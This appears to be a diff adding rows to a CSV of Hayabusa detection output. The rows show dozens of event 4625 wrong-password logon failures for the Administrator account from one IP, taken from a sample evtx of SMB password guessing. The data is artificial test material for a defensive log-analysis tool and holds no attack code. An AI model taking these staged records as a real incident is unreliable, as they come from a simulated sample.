+2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1R4wlYWS4SkM3dF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsZy0Yjvk720Mu22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RusStjhReKBmS0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eJuPYLTcGaGvErLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: raCbua01mzU1Djuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fnt8atAbMtxXivUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: psokvQJyMn5m5rMh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
